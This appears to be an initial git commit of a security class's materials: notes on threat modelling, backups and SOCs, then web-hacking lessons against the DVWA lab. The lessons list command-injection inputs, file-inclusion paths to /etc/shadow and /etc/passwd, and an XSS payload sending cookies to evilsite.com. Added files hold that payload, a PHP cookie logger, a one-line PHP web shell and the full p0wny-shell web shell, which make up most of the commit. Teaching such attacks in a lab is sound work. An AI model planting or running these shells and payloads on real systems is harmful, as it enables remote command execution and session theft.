Initial commit
This commit is contained in:
@@ -0,0 +1,2 @@
|
||||
# Auto detect text files and perform LF normalization
|
||||
* text=auto
|
||||
@@ -0,0 +1,157 @@
|
||||
Lesson 1: Theory
|
||||
define "assessing threats and mitigating risk within means"
|
||||
"assessing theats"
|
||||
Threat actors "who is threatening my shit"
|
||||
Script kiddies - hack for bragging rights, low sophistication
|
||||
"a `hacker` who uses premade tools and exploits without understanding them"
|
||||
Hacktivists - Political motive
|
||||
higher sophistication
|
||||
more motivated
|
||||
far more targeted
|
||||
Organized crime - profit motive
|
||||
Even higher sophistication
|
||||
Scams, spam, phishing, malware
|
||||
"scanning the whole fuckin internet for known exploits"
|
||||
APTs - Advanced Persistant Threats - nation-state actors
|
||||
Highest level of sophistication
|
||||
Highly funded, large groups, well Organized
|
||||
Espionage motives - occasional profit motive
|
||||
Tend to operate in social engineering or especially 0day exploits.
|
||||
Super important: find out who your most likely threat actors are.
|
||||
Assets
|
||||
"what shit do I have that needs to be protected" / "attack surface"
|
||||
computers, phones, apps, servers, etc
|
||||
Human beings
|
||||
Super important: inventory your assets
|
||||
"risk"
|
||||
Financial
|
||||
Reputational / social
|
||||
Political
|
||||
Important: find out what the risk of being pwned is
|
||||
"mitigating"
|
||||
Important: what assets should we focus on protecting?
|
||||
Important: how should we go about protecting them?
|
||||
"means"
|
||||
Money
|
||||
Time
|
||||
user compliance
|
||||
GRC
|
||||
Governance
|
||||
Policies
|
||||
Adminsistration
|
||||
"structure"
|
||||
Risk
|
||||
above
|
||||
Compliance
|
||||
"what laws do we have to follow?"
|
||||
CIA Triad
|
||||
Confidentiality
|
||||
keep secrets secret
|
||||
Make sure the people who need access, have access, securely
|
||||
Integrity
|
||||
Make sure your data is intact, unmodified, uncorrupted, correct
|
||||
Availabiltiy
|
||||
"make sure what should be available remains available"
|
||||
|
||||
Blue Team
|
||||
"on defence"
|
||||
Red Team "informs blue team"
|
||||
"white hack hackers"
|
||||
Try to break blue team's shit
|
||||
they exist to inform blue team.
|
||||
Purple Team "red team and blue team work together"
|
||||
best model (imo)
|
||||
|
||||
Inventory Threats
|
||||
Make a list of shit that could go wrong, as complete as possible
|
||||
organize by impact and likelyhood
|
||||
|
||||
Threat heatmap
|
||||
a simple heatmap
|
||||
likelyhood of an attack (per year) (1-100%)
|
||||
VS
|
||||
impact of an attack (1-100)
|
||||
One corner is "high likelyhood, high impact"
|
||||
focus resources at quadrent
|
||||
Opposite corner is "low likelyhood, low impact"
|
||||
monitor, keep an eye on it
|
||||
|
||||
Continuity of business / disaster response/recovery
|
||||
"to keep shit up and running when shit goes wrong"
|
||||
Important: make a frikkn plan
|
||||
Include: timeframe for fixes and cost of fixes
|
||||
Backups
|
||||
FUCKING DO THEM TWO LOCAL ONE REMOTE MINIMUM
|
||||
Types:
|
||||
Incremental
|
||||
only back up data that has changed
|
||||
uses less disk space
|
||||
can be used for recovering from file deletes, mistakes, etc where you want to roll back the data
|
||||
often the slowest to fully recover from
|
||||
Full
|
||||
just a full, seperate copy of all your data
|
||||
os image, whatever
|
||||
the largest in terms of filesize
|
||||
also the fastest to recover from
|
||||
You need both!
|
||||
Schedule
|
||||
"how often should we do a full backup?"
|
||||
"how long should we store old data?"
|
||||
"how often do we update the redundant storage?"
|
||||
|
||||
Redundancy
|
||||
"having more than one thing in case it breaks"
|
||||
9s problem
|
||||
99% uptime on a decent thing is kinda a given
|
||||
99.9% uptime (one 9 of uptime)
|
||||
backup servers
|
||||
faster incident response
|
||||
more redundancy and procedure
|
||||
99.99% uptime (two 9s)
|
||||
geographically seperated backup servers
|
||||
content delivery network
|
||||
backup equipment to work on it (workstations, etc)
|
||||
99.999+% uptime (three 9s)
|
||||
fuckikn insane google-tier shit
|
||||
Important: define what level of redundancy you need and can afford
|
||||
|
||||
Cold site, warm site, hot site
|
||||
"spaces, physical or digital, that you can fall back to"
|
||||
Backup physical office space
|
||||
Backup datacenter
|
||||
A spare cloud hosting account with your images loaded
|
||||
Cold site
|
||||
a backup space that will take some real time to get running
|
||||
Hot site
|
||||
a site that is 100% functional and ready to switch to at any time
|
||||
Warm site
|
||||
somewhere in-between
|
||||
Power (electrical generator, power bank)
|
||||
Manpower
|
||||
Hardware (backup workstations, etc)
|
||||
Backups
|
||||
Important: "what is so important that we will spend money and time to mitigate downtime?"
|
||||
Security Team
|
||||
CISO - Cheif Information Security Officer
|
||||
Generally report to the Chief Information Officer (CIO) or the Cheif Technical Officer (CTO)
|
||||
Imo: CISO should to the board/president
|
||||
Policymakers - make policies and rules and shit
|
||||
|
||||
Administration level - managing shit day to day
|
||||
|
||||
SOC - Security Operations Center
|
||||
SOCs are fuckin cool
|
||||
SOC base-level employee is a "threat analyst"
|
||||
Monitor the cyber security status of the comany
|
||||
tools like Splunk aggregate logs and alerts and put them into big tables, graphs, charts, maps, etc
|
||||
When soemthing happens, they escelate to incident resoponse (IR)
|
||||
which could be elevated to the disaster recovery team (OneDrive)
|
||||
|
||||
Monitoring
|
||||
aggregate logs, alerts, security involved actions, all in one place
|
||||
Splunk or free option ELK Stack
|
||||
Baselining
|
||||
"finding out what `normal` looks like, and build alerts for deviations"
|
||||
AI works super good for this as a STARTING POINT
|
||||
|
||||
Cyber security domains: https://taosecurity.blogspot.com/2017/03/cybersecurity-domains-mind-map.html
|
||||
@@ -0,0 +1,128 @@
|
||||
== Networking ==
|
||||
IPv4/IPv6
|
||||
ipv4 127.0.0.1
|
||||
ipv6 2001:db8:3c4d:15::1a2f:1a2b.
|
||||
DNS
|
||||
translates domain names into ip addressess
|
||||
|
||||
client server
|
||||
CLIENT = YOU(r device)
|
||||
web server in this case
|
||||
client: "hey google give me x page" -> upload
|
||||
google: "here I found it, go ahead and download this page" <- download
|
||||
request -> reply
|
||||
|
||||
TCP/UDP
|
||||
|
||||
web pages
|
||||
files. .html .php .aspx
|
||||
request: /dogs.html -> server: here is dogs.html
|
||||
request/reply/"everything is a file"
|
||||
frontend/backend
|
||||
|
||||
get/post/etc
|
||||
"hey google, search for ppony fanfics"
|
||||
request: POST search=pony fanfics
|
||||
|
||||
frontend: is the stuff sent to your Browser
|
||||
and the web pages you make requests to
|
||||
(public, client-facing)
|
||||
html/css/javascript
|
||||
backend: web servers,
|
||||
php, node,
|
||||
database, actions, api
|
||||
|
||||
== Basic Web Hacking ==
|
||||
DVWA
|
||||
Web Browser:
|
||||
* command injection
|
||||
get the GET var (ip)
|
||||
load that into a command (ping command)
|
||||
execute
|
||||
theory: execute("ping $ip");
|
||||
$ip = 8.8.8.8
|
||||
Theory execute("ping 8.8.8.8")
|
||||
$ip = 8.8.8.8; ls
|
||||
$ip = 8.8.8.8 && ls -lah && whoami && groups && id
|
||||
$ip = 8.8.8.8 && echo "hello world" > file.txt
|
||||
|
||||
a few things to try:
|
||||
; (stack commands)
|
||||
&& (stacks commands)
|
||||
` (executes commands on some systems)
|
||||
echo "something" > file.php (make a file)
|
||||
|
||||
* LFI
|
||||
Local File Inclusion
|
||||
"web server loads a file from its own drive and shows it"
|
||||
try making it read a sensitive file?
|
||||
a few things to try:
|
||||
/etc/shadow
|
||||
/etc/passwd
|
||||
../../../../../../../../etc/passwd
|
||||
Leak sensitive files
|
||||
Database files
|
||||
* RFI upload
|
||||
When web server downlaods and executes a remote file
|
||||
like: /page.php?file=file1.php -> /page.php?file=https://pastebin.com/raw/jmtqDfWQ
|
||||
(if you need multiple GET variables):
|
||||
./page.php?file=https://pastebin.com/raw/jmtqDfWQ&somevar=1337
|
||||
(append &variablename=value)
|
||||
a few things to try:
|
||||
PHP shell
|
||||
p0wny-shell-FI-mod: https://pastebin.com/raw/jmtqDfWQ ( Source: https://github.com/flozz/p0wny-shell )
|
||||
simple-php-shell: https://pastebin.com/raw/uxbKCBGg
|
||||
Malware of any type
|
||||
* Stored XSS
|
||||
<script>
|
||||
i=new Image();
|
||||
i.src="http://evilsite.com/cookielogger.php?cookie="+document.cookie;
|
||||
document.appendChild(i);
|
||||
</script>
|
||||
* Reflected XSS
|
||||
like search pages, etc
|
||||
uses GET variables in the URL usually
|
||||
requires tricking a victem into clicking a malicious link
|
||||
* Open HTTP Redirect
|
||||
get variables usually
|
||||
just let you redirect from a legitimate site to your own
|
||||
usually requires getting a victim to click a malicious link
|
||||
|
||||
SQL Injection:
|
||||
"modifying an SQL query to do something fun"
|
||||
Lab: https://www.db-fiddle.com/f/mZ2ftcLLzZLbrEELn38hjQ/17
|
||||
Theory: SELEC
|
||||
$user = Delilah123
|
||||
$password = ??
|
||||
SELECT * FROM users WHERE username='$user' AND password='$password';
|
||||
$password = '
|
||||
SELECT * FROM users WHERE username='Delilah123' AND password=''';
|
||||
ERROR!
|
||||
$password = anythinghere' OR 1=1
|
||||
SELECT * FROM users WHERE username='Delilah123' AND password='anythinghere' OR 1=1'
|
||||
ERROR
|
||||
> always true!
|
||||
|
||||
$password = anythinghere' OR 1=1 --
|
||||
-- is an sql comment! (space at start and end)
|
||||
SELECT * FROM users WHERE username='Delilah123' AND password='anythinghere' OR 1=1 -- '
|
||||
EXECUTES AND MATCHES!
|
||||
|
||||
#Burp Suite:
|
||||
#* Weak session IDs
|
||||
#* Brute force
|
||||
|
||||
#Coding:
|
||||
#* CSRF
|
||||
#* XSS keylogger
|
||||
#* Advanced XSS+CSRF payload
|
||||
|
||||
Links:
|
||||
SQL Injection Lab (WIP): https://www.db-fiddle.com/f/mZ2ftcLLzZLbrEELn38hjQ/16
|
||||
p0wny-shell-FI-mod: https://pastebin.com/raw/jmtqDfWQ ( Source: https://github.com/flozz/p0wny-shell )
|
||||
simple-php-shell: https://pastebin.com/raw/uxbKCBGg
|
||||
basic XSS cookie stealer: https://pastebin.com/raw/puftrh39
|
||||
General payloads including XSS and SQL Injection: https://swisskyrepo.github.io/PayloadsAllTheThings/
|
||||
General hacking: https://cheatsheet.haax.fr/
|
||||
Pi Pico W Power Analysis Tool (WIP): https://github.com/PrincessPi3/PiPicoPATLFGGGGG
|
||||
|
||||
@@ -0,0 +1,5 @@
|
||||
<script>
|
||||
i=new Image();
|
||||
i.src="http://evilsite.com/cookielogger.php?cookie="+document.cookie;
|
||||
document.appendChild(i);
|
||||
</script>
|
||||
@@ -0,0 +1 @@
|
||||
<?php file_put_contents("cookies.txt", $_GET['cookie'], FILE_APPEND); ?>
|
||||
@@ -0,0 +1 @@
|
||||
<?php print(shell_exec($_GET['x']));die();?>
|
||||
@@ -0,0 +1,609 @@
|
||||
<?php
|
||||
// Source: https://github.com/flozz/p0wny-shell
|
||||
|
||||
$SHELL_CONFIG = array(
|
||||
'username' => 'admin',
|
||||
'hostname' => 'password',
|
||||
);
|
||||
|
||||
function expandPath($path) {
|
||||
if (preg_match("#^(~[a-zA-Z0-9_.-]*)(/.*)?$#", $path, $match)) {
|
||||
exec("echo $match[1]", $stdout);
|
||||
return $stdout[0] . $match[2];
|
||||
}
|
||||
return $path;
|
||||
}
|
||||
|
||||
function allFunctionExist($list = array()) {
|
||||
foreach ($list as $entry) {
|
||||
if (!function_exists($entry)) {
|
||||
return false;
|
||||
}
|
||||
}
|
||||
return true;
|
||||
}
|
||||
|
||||
function executeCommand($cmd) {
|
||||
$output = '';
|
||||
if (function_exists('exec')) {
|
||||
exec($cmd, $output);
|
||||
$output = implode("\n", $output);
|
||||
} else if (function_exists('shell_exec')) {
|
||||
$output = shell_exec($cmd);
|
||||
} else if (allFunctionExist(array('system', 'ob_start', 'ob_get_contents', 'ob_end_clean'))) {
|
||||
ob_start();
|
||||
system($cmd);
|
||||
$output = ob_get_contents();
|
||||
ob_end_clean();
|
||||
} else if (allFunctionExist(array('passthru', 'ob_start', 'ob_get_contents', 'ob_end_clean'))) {
|
||||
ob_start();
|
||||
passthru($cmd);
|
||||
$output = ob_get_contents();
|
||||
ob_end_clean();
|
||||
} else if (allFunctionExist(array('popen', 'feof', 'fread', 'pclose'))) {
|
||||
$handle = popen($cmd, 'r');
|
||||
while (!feof($handle)) {
|
||||
$output .= fread($handle, 4096);
|
||||
}
|
||||
pclose($handle);
|
||||
} else if (allFunctionExist(array('proc_open', 'stream_get_contents', 'proc_close'))) {
|
||||
$handle = proc_open($cmd, array(0 => array('pipe', 'r'), 1 => array('pipe', 'w')), $pipes);
|
||||
$output = stream_get_contents($pipes[1]);
|
||||
proc_close($handle);
|
||||
}
|
||||
return $output;
|
||||
}
|
||||
|
||||
function isRunningWindows() {
|
||||
return stripos(PHP_OS, "WIN") === 0;
|
||||
}
|
||||
|
||||
function featureShell($cmd, $cwd) {
|
||||
$stdout = "";
|
||||
|
||||
if (preg_match("/^\s*cd\s*(2>&1)?$/", $cmd)) {
|
||||
chdir(expandPath("~"));
|
||||
} elseif (preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmd)) {
|
||||
chdir($cwd);
|
||||
preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match);
|
||||
chdir(expandPath($match[1]));
|
||||
} elseif (preg_match("/^\s*download\s+[^\s]+\s*(2>&1)?$/", $cmd)) {
|
||||
chdir($cwd);
|
||||
preg_match("/^\s*download\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match);
|
||||
return featureDownload($match[1]);
|
||||
} else {
|
||||
chdir($cwd);
|
||||
$stdout = executeCommand($cmd);
|
||||
}
|
||||
|
||||
return array(
|
||||
"stdout" => base64_encode($stdout),
|
||||
"cwd" => base64_encode(getcwd())
|
||||
);
|
||||
}
|
||||
|
||||
function featurePwd() {
|
||||
return array("cwd" => base64_encode(getcwd()));
|
||||
}
|
||||
|
||||
function featureHint($fileName, $cwd, $type) {
|
||||
chdir($cwd);
|
||||
if ($type == 'cmd') {
|
||||
$cmd = "compgen -c $fileName";
|
||||
} else {
|
||||
$cmd = "compgen -f $fileName";
|
||||
}
|
||||
$cmd = "/bin/bash -c \"$cmd\"";
|
||||
$files = explode("\n", shell_exec($cmd));
|
||||
foreach ($files as &$filename) {
|
||||
$filename = base64_encode($filename);
|
||||
}
|
||||
return array(
|
||||
'files' => $files,
|
||||
);
|
||||
}
|
||||
|
||||
function featureDownload($filePath) {
|
||||
$file = @file_get_contents($filePath);
|
||||
if ($file === FALSE) {
|
||||
return array(
|
||||
'stdout' => base64_encode('File not found / no read permission.'),
|
||||
'cwd' => base64_encode(getcwd())
|
||||
);
|
||||
} else {
|
||||
return array(
|
||||
'name' => base64_encode(basename($filePath)),
|
||||
'file' => base64_encode($file)
|
||||
);
|
||||
}
|
||||
}
|
||||
|
||||
function featureUpload($path, $file, $cwd) {
|
||||
chdir($cwd);
|
||||
$f = @fopen($path, 'wb');
|
||||
if ($f === FALSE) {
|
||||
return array(
|
||||
'stdout' => base64_encode('Invalid path / no write permission.'),
|
||||
'cwd' => base64_encode(getcwd())
|
||||
);
|
||||
} else {
|
||||
fwrite($f, base64_decode($file));
|
||||
fclose($f);
|
||||
return array(
|
||||
'stdout' => base64_encode('Done.'),
|
||||
'cwd' => base64_encode(getcwd())
|
||||
);
|
||||
}
|
||||
}
|
||||
|
||||
function initShellConfig() {
|
||||
global $SHELL_CONFIG;
|
||||
|
||||
if (isRunningWindows()) {
|
||||
$username = getenv('USERNAME');
|
||||
if ($username !== false) {
|
||||
$SHELL_CONFIG['username'] = $username;
|
||||
}
|
||||
} else {
|
||||
$pwuid = posix_getpwuid(posix_geteuid());
|
||||
if ($pwuid !== false) {
|
||||
$SHELL_CONFIG['username'] = $pwuid['name'];
|
||||
}
|
||||
}
|
||||
|
||||
$hostname = gethostname();
|
||||
if ($hostname !== false) {
|
||||
$SHELL_CONFIG['hostname'] = $hostname;
|
||||
}
|
||||
}
|
||||
|
||||
if (isset($_GET["feature"])) {
|
||||
|
||||
$response = NULL;
|
||||
|
||||
switch ($_GET["feature"]) {
|
||||
case "shell":
|
||||
$cmd = $_POST['cmd'];
|
||||
if (!preg_match('/2>/', $cmd)) {
|
||||
$cmd .= ' 2>&1';
|
||||
}
|
||||
$response = featureShell($cmd, $_POST["cwd"]);
|
||||
break;
|
||||
case "pwd":
|
||||
$response = featurePwd();
|
||||
break;
|
||||
case "hint":
|
||||
$response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);
|
||||
break;
|
||||
case 'upload':
|
||||
$response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);
|
||||
}
|
||||
|
||||
header("Content-Type: application/json");
|
||||
echo json_encode($response);
|
||||
die();
|
||||
} else {
|
||||
initShellConfig();
|
||||
}
|
||||
|
||||
?><!DOCTYPE html>
|
||||
|
||||
<html>
|
||||
|
||||
<head>
|
||||
<meta charset="UTF-8" />
|
||||
<title>p0wny@shell:~#</title>
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
|
||||
<style>
|
||||
html, body {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
background: #333;
|
||||
color: #eee;
|
||||
font-family: monospace;
|
||||
width: 100vw;
|
||||
height: 100vh;
|
||||
overflow: hidden;
|
||||
}
|
||||
|
||||
*::-webkit-scrollbar-track {
|
||||
border-radius: 8px;
|
||||
background-color: #353535;
|
||||
}
|
||||
|
||||
*::-webkit-scrollbar {
|
||||
width: 8px;
|
||||
height: 8px;
|
||||
}
|
||||
|
||||
*::-webkit-scrollbar-thumb {
|
||||
border-radius: 8px;
|
||||
-webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);
|
||||
background-color: #bcbcbc;
|
||||
}
|
||||
|
||||
#shell {
|
||||
background: #222;
|
||||
box-shadow: 0 0 5px rgba(0, 0, 0, .3);
|
||||
font-size: 10pt;
|
||||
display: flex;
|
||||
flex-direction: column;
|
||||
align-items: stretch;
|
||||
max-width: calc(100vw - 2 * var(--shell-margin));
|
||||
max-height: calc(100vh - 2 * var(--shell-margin));
|
||||
resize: both;
|
||||
overflow: hidden;
|
||||
width: 100%;
|
||||
height: 100%;
|
||||
margin: var(--shell-margin) auto;
|
||||
}
|
||||
|
||||
#shell-content {
|
||||
overflow: auto;
|
||||
padding: 5px;
|
||||
white-space: pre-wrap;
|
||||
flex-grow: 1;
|
||||
}
|
||||
|
||||
#shell-logo {
|
||||
font-weight: bold;
|
||||
color: #FF4180;
|
||||
text-align: center;
|
||||
}
|
||||
|
||||
:root {
|
||||
--shell-margin: 25px;
|
||||
}
|
||||
|
||||
@media (min-width: 1200px) {
|
||||
:root {
|
||||
--shell-margin: 50px !important;
|
||||
}
|
||||
}
|
||||
|
||||
@media (max-width: 991px),
|
||||
(max-height: 600px) {
|
||||
#shell-logo {
|
||||
font-size: 6px;
|
||||
margin: -25px 0;
|
||||
}
|
||||
:root {
|
||||
--shell-margin: 0 !important;
|
||||
}
|
||||
#shell {
|
||||
resize: none;
|
||||
}
|
||||
}
|
||||
|
||||
@media (max-width: 767px) {
|
||||
#shell-input {
|
||||
flex-direction: column;
|
||||
}
|
||||
}
|
||||
|
||||
@media (max-width: 320px) {
|
||||
#shell-logo {
|
||||
font-size: 5px;
|
||||
}
|
||||
}
|
||||
|
||||
.shell-prompt {
|
||||
font-weight: bold;
|
||||
color: #75DF0B;
|
||||
}
|
||||
|
||||
.shell-prompt > span {
|
||||
color: #1BC9E7;
|
||||
}
|
||||
|
||||
#shell-input {
|
||||
display: flex;
|
||||
box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);
|
||||
border-top: rgba(255, 255, 255, .05) solid 1px;
|
||||
padding: 10px 0;
|
||||
}
|
||||
|
||||
#shell-input > label {
|
||||
flex-grow: 0;
|
||||
display: block;
|
||||
padding: 0 5px;
|
||||
height: 30px;
|
||||
line-height: 30px;
|
||||
}
|
||||
|
||||
#shell-input #shell-cmd {
|
||||
height: 30px;
|
||||
line-height: 30px;
|
||||
border: none;
|
||||
background: transparent;
|
||||
color: #eee;
|
||||
font-family: monospace;
|
||||
font-size: 10pt;
|
||||
width: 100%;
|
||||
align-self: center;
|
||||
box-sizing: border-box;
|
||||
}
|
||||
|
||||
#shell-input div {
|
||||
flex-grow: 1;
|
||||
align-items: stretch;
|
||||
}
|
||||
|
||||
#shell-input input {
|
||||
outline: none;
|
||||
}
|
||||
</style>
|
||||
|
||||
<script>
|
||||
var SHELL_CONFIG = <?php echo json_encode($SHELL_CONFIG); ?>;
|
||||
var CWD = null;
|
||||
var commandHistory = [];
|
||||
var historyPosition = 0;
|
||||
var eShellCmdInput = null;
|
||||
var eShellContent = null;
|
||||
|
||||
function _insertCommand(command) {
|
||||
eShellContent.innerHTML += "\n\n";
|
||||
eShellContent.innerHTML += '<span class=\"shell-prompt\">' + genPrompt(CWD) + '</span> ';
|
||||
eShellContent.innerHTML += escapeHtml(command);
|
||||
eShellContent.innerHTML += "\n";
|
||||
eShellContent.scrollTop = eShellContent.scrollHeight;
|
||||
}
|
||||
|
||||
function _insertStdout(stdout) {
|
||||
eShellContent.innerHTML += escapeHtml(stdout);
|
||||
eShellContent.scrollTop = eShellContent.scrollHeight;
|
||||
}
|
||||
|
||||
function _defer(callback) {
|
||||
setTimeout(callback, 0);
|
||||
}
|
||||
|
||||
function featureShell(command) {
|
||||
|
||||
_insertCommand(command);
|
||||
if (/^\s*upload\s+[^\s]+\s*$/.test(command)) {
|
||||
featureUpload(command.match(/^\s*upload\s+([^\s]+)\s*$/)[1]);
|
||||
} else if (/^\s*clear\s*$/.test(command)) {
|
||||
// Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer
|
||||
eShellContent.innerHTML = '';
|
||||
} else {
|
||||
makeRequest("&feature=shell", {cmd: command, cwd: CWD}, function (response) {
|
||||
if (response.hasOwnProperty('file')) {
|
||||
featureDownload(atob(response.name), response.file)
|
||||
} else {
|
||||
_insertStdout(atob(response.stdout));
|
||||
updateCwd(atob(response.cwd));
|
||||
}
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
function featureHint() {
|
||||
if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete
|
||||
|
||||
function _requestCallback(data) {
|
||||
if (data.files.length <= 1) return; // no completion
|
||||
data.files = data.files.map(function(file){
|
||||
return atob(file);
|
||||
});
|
||||
if (data.files.length === 2) {
|
||||
if (type === 'cmd') {
|
||||
eShellCmdInput.value = data.files[0];
|
||||
} else {
|
||||
var currentValue = eShellCmdInput.value;
|
||||
eShellCmdInput.value = currentValue.replace(/([^\s]*)$/, data.files[0]);
|
||||
}
|
||||
} else {
|
||||
_insertCommand(eShellCmdInput.value);
|
||||
_insertStdout(data.files.join("\n"));
|
||||
}
|
||||
}
|
||||
|
||||
var currentCmd = eShellCmdInput.value.split(" ");
|
||||
var type = (currentCmd.length === 1) ? "cmd" : "file";
|
||||
var fileName = (type === "cmd") ? currentCmd[0] : currentCmd[currentCmd.length - 1];
|
||||
|
||||
makeRequest(
|
||||
"&feature=hint",
|
||||
{
|
||||
filename: fileName,
|
||||
cwd: CWD,
|
||||
type: type
|
||||
},
|
||||
_requestCallback
|
||||
);
|
||||
|
||||
}
|
||||
|
||||
function featureDownload(name, file) {
|
||||
var element = document.createElement('a');
|
||||
element.setAttribute('href', 'data:application/octet-stream;base64,' + file);
|
||||
element.setAttribute('download', name);
|
||||
element.style.display = 'none';
|
||||
document.body.appendChild(element);
|
||||
element.click();
|
||||
document.body.removeChild(element);
|
||||
_insertStdout('Done.');
|
||||
}
|
||||
|
||||
function featureUpload(path) {
|
||||
var element = document.createElement('input');
|
||||
element.setAttribute('type', 'file');
|
||||
element.style.display = 'none';
|
||||
document.body.appendChild(element);
|
||||
element.addEventListener('change', function () {
|
||||
var promise = getBase64(element.files[0]);
|
||||
promise.then(function (file) {
|
||||
makeRequest('&feature=upload', {path: path, file: file, cwd: CWD}, function (response) {
|
||||
_insertStdout(atob(response.stdout));
|
||||
updateCwd(atob(response.cwd));
|
||||
});
|
||||
}, function () {
|
||||
_insertStdout('An unknown client-side error occurred.');
|
||||
});
|
||||
});
|
||||
element.click();
|
||||
document.body.removeChild(element);
|
||||
}
|
||||
|
||||
function getBase64(file, onLoadCallback) {
|
||||
return new Promise(function(resolve, reject) {
|
||||
var reader = new FileReader();
|
||||
reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };
|
||||
reader.onerror = reject;
|
||||
reader.readAsDataURL(file);
|
||||
});
|
||||
}
|
||||
|
||||
function genPrompt(cwd) {
|
||||
cwd = cwd || "~";
|
||||
var shortCwd = cwd;
|
||||
if (cwd.split("/").length > 3) {
|
||||
var splittedCwd = cwd.split("/");
|
||||
shortCwd = "…/" + splittedCwd[splittedCwd.length-2] + "/" + splittedCwd[splittedCwd.length-1];
|
||||
}
|
||||
return SHELL_CONFIG["username"] + "@" + SHELL_CONFIG["hostname"] + ":<span title=\"" + cwd + "\">" + shortCwd + "</span>#";
|
||||
}
|
||||
|
||||
function updateCwd(cwd) {
|
||||
if (cwd) {
|
||||
CWD = cwd;
|
||||
_updatePrompt();
|
||||
return;
|
||||
}
|
||||
makeRequest("&feature=pwd", {}, function(response) {
|
||||
CWD = atob(response.cwd);
|
||||
_updatePrompt();
|
||||
});
|
||||
|
||||
}
|
||||
|
||||
function escapeHtml(string) {
|
||||
return string
|
||||
.replace(/&/g, "&")
|
||||
.replace(/</g, "<")
|
||||
.replace(/>/g, ">");
|
||||
}
|
||||
|
||||
function _updatePrompt() {
|
||||
var eShellPrompt = document.getElementById("shell-prompt");
|
||||
eShellPrompt.innerHTML = genPrompt(CWD);
|
||||
}
|
||||
|
||||
function _onShellCmdKeyDown(event) {
|
||||
switch (event.key) {
|
||||
case "Enter":
|
||||
featureShell(eShellCmdInput.value);
|
||||
insertToHistory(eShellCmdInput.value);
|
||||
eShellCmdInput.value = "";
|
||||
break;
|
||||
case "ArrowUp":
|
||||
if (historyPosition > 0) {
|
||||
historyPosition--;
|
||||
eShellCmdInput.blur();
|
||||
eShellCmdInput.value = commandHistory[historyPosition];
|
||||
_defer(function() {
|
||||
eShellCmdInput.focus();
|
||||
});
|
||||
}
|
||||
break;
|
||||
case "ArrowDown":
|
||||
if (historyPosition >= commandHistory.length) {
|
||||
break;
|
||||
}
|
||||
historyPosition++;
|
||||
if (historyPosition === commandHistory.length) {
|
||||
eShellCmdInput.value = "";
|
||||
} else {
|
||||
eShellCmdInput.blur();
|
||||
eShellCmdInput.focus();
|
||||
eShellCmdInput.value = commandHistory[historyPosition];
|
||||
}
|
||||
break;
|
||||
case 'Tab':
|
||||
event.preventDefault();
|
||||
featureHint();
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
function insertToHistory(cmd) {
|
||||
commandHistory.push(cmd);
|
||||
historyPosition = commandHistory.length;
|
||||
}
|
||||
|
||||
function makeRequest(url, params, callback) {
|
||||
function getQueryString() {
|
||||
var a = [];
|
||||
for (var key in params) {
|
||||
if (params.hasOwnProperty(key)) {
|
||||
a.push(encodeURIComponent(key) + "=" + encodeURIComponent(params[key]));
|
||||
}
|
||||
}
|
||||
return a.join("&");
|
||||
}
|
||||
var url_plus = window.location+url;
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.open("POST", url_plus, true);
|
||||
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
|
||||
xhr.onreadystatechange = function() {
|
||||
if (xhr.readyState === 4 && xhr.status === 200) {
|
||||
try {
|
||||
var responseJson = JSON.parse(xhr.responseText);
|
||||
callback(responseJson);
|
||||
} catch (error) {
|
||||
alert("Error while parsing response: " + error);
|
||||
}
|
||||
}
|
||||
};
|
||||
xhr.send(getQueryString());
|
||||
}
|
||||
|
||||
document.onclick = function(event) {
|
||||
event = event || window.event;
|
||||
var selection = window.getSelection();
|
||||
var target = event.target || event.srcElement;
|
||||
|
||||
if (target.tagName === "SELECT") {
|
||||
return;
|
||||
}
|
||||
|
||||
if (!selection.toString()) {
|
||||
eShellCmdInput.focus();
|
||||
}
|
||||
};
|
||||
|
||||
window.onload = function() {
|
||||
eShellCmdInput = document.getElementById("shell-cmd");
|
||||
eShellContent = document.getElementById("shell-content");
|
||||
updateCwd();
|
||||
eShellCmdInput.focus();
|
||||
};
|
||||
</script>
|
||||
</head>
|
||||
|
||||
<body>
|
||||
<div id="shell">
|
||||
<pre id="shell-content">
|
||||
<div id="shell-logo">
|
||||
___ ____ _ _ _ _ _ <span></span>
|
||||
_ __ / _ \__ ___ __ _ _ / __ \ ___| |__ ___| | |_ /\/|| || |_ <span></span>
|
||||
| '_ \| | | \ \ /\ / / '_ \| | | |/ / _` / __| '_ \ / _ \ | (_)/\/_ .. _|<span></span>
|
||||
| |_) | |_| |\ V V /| | | | |_| | | (_| \__ \ | | | __/ | |_ |_ _|<span></span>
|
||||
| .__/ \___/ \_/\_/ |_| |_|\__, |\ \__,_|___/_| |_|\___|_|_(_) |_||_| <span></span>
|
||||
|_| |___/ \____/ <span></span>
|
||||
</div>
|
||||
</pre>
|
||||
<div id="shell-input">
|
||||
<label for="shell-cmd" id="shell-prompt" class="shell-prompt">???</label>
|
||||
<div>
|
||||
<input id="shell-cmd" name="cmd" onkeydown="_onShellCmdKeyDown(event)"/>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
<p><b><a href="https://github.com/flozz/p0wny-shell">Source: p0wny-shell by flozz</a></b><p>
|
||||
</body>
|
||||
|
||||
</html>
|
||||
<?php die(); ?>
|
||||
Reference in New Issue
Block a user